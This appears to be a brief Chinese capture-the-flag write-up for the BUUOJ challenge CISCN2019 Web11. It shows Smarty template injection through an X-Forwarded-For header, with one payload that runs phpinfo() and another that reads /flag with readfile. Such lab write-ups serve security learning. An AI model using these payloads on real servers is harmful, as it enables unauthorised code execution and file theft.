题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,看到提示Smarty,猜测使用模板注入漏洞
第二步:构建漏洞
使用burpsuite改包,添加X-Forwarded-For头,X-Forwarded-For:{if phpinfo()}{/if},发现执行了phpinfo()
第三步:获取flag
使用X-Forwarded-For:{if readfile('/flag')}{/if}获取flag
详细解决方案
第六十三题——[CISCN2019 华东南赛区]Web11
热度:101 发布时间:2023-11-19 19:31:41.0